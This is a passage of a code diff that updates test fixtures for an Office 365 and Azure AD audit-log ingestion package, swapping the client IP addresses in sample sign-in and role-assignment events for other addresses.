,{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125407700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json index f8c6f611239..a3434906831 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json @@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20,10 +20,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:13", "ExtendedProperties": [ { @@ -73,7 +73,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -91,10 +91,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:53:24", "ExtendedProperties": [ { @@ -144,7 +144,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -162,10 +162,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:29:01", "ExtendedProperties": [ { @@ -215,7 +215,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -233,10 +233,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:52:06", "ExtendedProperties": [ { @@ -286,7 +286,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 